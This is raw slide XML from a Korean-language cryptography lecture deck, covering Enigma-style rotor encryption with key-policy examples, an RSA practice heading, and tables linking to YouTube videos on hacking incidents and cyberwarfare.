        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062244" y="3268089"/>
            <a:ext cx="508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8A62179-03BD-4BB0-97DA-F5A7B3880FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193196" y="3109943"/>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a:t>날마다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 초기 위치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>적혀있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 책이 존재</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="직선 연결선 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46C3A6C-5A3E-4AEF-8BC5-0FFA68992109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796124" y="2806913"/>
            <a:ext cx="962902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F620566-0AAF-4C1E-B3B0-4D036D40EAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910385" y="3572477"/>
            <a:ext cx="598996" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045CA964-174A-478A-A982-A9838B9588CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193195" y="4037211"/>
            <a:ext cx="5152445" cy="6970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t>개인의 설정할 키를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>책에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>적혀저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 있는 키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>policy - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>한번 사용한 개인 설정 키는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다시 사용하지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170F9D27-A42D-43B0-A754-89332B11072C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790697" y="4216499"/>
            <a:ext cx="682487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAVY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF40D915-D871-42C3-A85F-F7FA24E05E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826894" y="4216498"/>
            <a:ext cx="682487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="직선 화살표 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C53E176-6752-454E-88CD-14AF31C15F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="3"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2473184" y="4370387"/>
            <a:ext cx="135371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D9DA544-CEEF-4D80-B931-1597DD218727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886655" y="3924071"/>
            <a:ext cx="598996"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ABC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0C43A5A-BB3E-4A6E-A1FF-9E5C0A2F1256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193195" y="5257156"/>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err="1"/>
              <a:t>평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>암호화된 개인키로 암호화한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4B1FE0-F150-4ED6-98E5-533A5E818354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201638" y="5257156"/>
            <a:ext cx="1271545" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>IAMHUNGRY</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0BFF03-8ABC-48FC-8AD5-DAD230DA6C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3826894" y="5257155"/>
            <a:ext cx="1175469" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>XHETLSPLW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="직선 화살표 연결선 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BF4E1B-98B1-4975-98B3-381D9B6F8EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2473183" y="5411044"/>
            <a:ext cx="13537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120598D-3413-49A3-BF65-E09619C8149C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889965" y="4974292"/>
            <a:ext cx="682487"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XYZW</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0F3FD9-4D7B-4D07-A3A2-375B874E039D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996065" y="5913051"/>
            <a:ext cx="10199869" cy="3755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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>결국</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호체계 자체는 그 당시의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>컴퓨터 환경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>에 비해 안전했으나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 지켜지지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>영화와 같은 크래킹이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="직선 연결선 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2549FB69-D6A3-4B17-BED9-F3A169DE1E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775582" y="5670708"/>
            <a:ext cx="962902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249518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en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>현대암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– RSA</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83124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10257225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3559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139006-5E21-45FB-91D8-84C2FCE57E4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8210D1F-6621-4374-A2B3-21A9DB5AD646}"/>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9740377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a:xfrm>
            <a:off x="838200" y="2766218"/>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부록</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="화살표: 오른쪽 2">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68952EE9-EA36-40D6-8579-506BFF052086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580445" y="2997643"/>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6148633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시연</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5B9977C2-3518-44F2-B5FC-D27847E33239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="918938720"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1798694"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3082886">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1449358">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2799559108"/>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https://www.youtube.com/watch?v=fDXQYezdcIQ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Mysql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>취약점을 이용하여 공격자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>pc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>exploit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웹해킹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https://www.youtube.com/watch?v=MA6ugSrB8eY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지뢰찾기</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>Crack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rPr>
                        <a:t>https://www.youtube.com/watch?v=jZPudR4pWxM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스마트홈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 기능 취약점 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해킹</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88353">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329">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2602977"/>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8485746"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388775804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관련 영상</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1854457096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2255365" y="2411681"/>
          <a:ext cx="7466275" cy="3275895"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3784821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>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https://www.youtube.com/watch?v=GisH2IQgob8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해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> vs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>남과북</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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=DkySqacKXlU</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사이버사령부 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>국방망</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 악성코드 침투사례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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=gmt_mmo30Js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사이버테러 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>3.20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>전산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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=nfOLhuNwfI0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코로나 제약회사 해킹공격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168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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=CVDDmotEmvI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사이버전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미군 말하는 사이버전의 위력</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7044283"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="18735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rPr>
                        <a:t>https://www.youtube.com/watch?v=ynrsAtAlHqo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북한의 엄청난 해킹능력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소비에트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3493698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="15790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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=XGWP7v0OzTI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미드웨이 해전 암호해독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5839265"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12844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file"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=o4dCzqy1JrY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영화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에니그마</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 해독 장면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88990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rPr>
                        <a:t>https://www.youtube.com/watch?v=IS3UpC121bI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어나니머스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 란 어떤 집단인가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258162"/>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92787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108375"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43000368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1069073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00B6792F-6684-4352-A547-72B016DB88D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3586926282"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2609850" y="2417761"/>
          <a:ext cx="6905625" cy="3325813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="823422">
                  <a:extLst>
